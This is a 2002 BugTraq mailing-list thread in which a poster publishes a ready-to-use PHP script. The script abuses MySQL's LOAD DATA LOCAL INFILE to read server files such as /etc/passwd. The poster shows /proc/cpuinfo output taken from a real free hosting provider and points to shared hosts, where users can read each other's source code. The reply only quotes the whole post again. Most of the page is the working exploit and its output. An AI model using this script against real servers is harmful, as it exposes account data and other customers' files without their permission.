BugTraq
Back to list
|
Post reply
File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 26 2002 10:57AM
Hai Nam Luke (hainamluke hotmail com)
(1 replies)
Attacker can use PHP and mySQL to read some local file following this way:
# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)
======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser,
$dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl
= 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO
TABLE
$tbl FIELDS "
. "TERMINATED BY
'__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "</pre>";
?>
======================================================
You'll recived all source of /etc/passwd
This vulnerable is very dangerous because user can read some important
file in your server. Especially, at any free host, user can use local
exploit to read source code of other user and attack one another.
Example: I uploaded this file and config it at http://members.lycos.co.uk/
and I
was recived their file: "/proc/cpuinfo" :
==============================================================
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
==============================================================
And many another files, please check your server !
Thank to dodo. Sorry for my poor English !
Luke (HVA)
http://www.hackervn.net
[ reply ]
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 27 2002 09:54AM
Dave Wilson (dw botanicus net)
Privacy Statement
Copyright 2010, SecurityFocus
Attacker can use PHP and mySQL to read some local file following this way:
# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)
======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser,
$dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl
= 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO
TABLE
$tbl FIELDS "
. "TERMINATED BY
'__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "</pre>";
?>
======================================================
You'll recived all source of /etc/passwd
This vulnerable is very dangerous because user can read some important
file in your server. Especially, at any free host, user can use local
exploit to read source code of other user and attack one another.
Example: I uploaded this file and config it at http://members.lycos.co.uk/
and I
was recived their file: "/proc/cpuinfo" :
==============================================================
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca
cmov pat pse36
mmx fxsr sse
bogomips : 1992.29
==============================================================
And many another files, please check your server !
Thank to dodo. Sorry for my poor English !
Luke (HVA)
http://www.hackervn.net
[ reply ]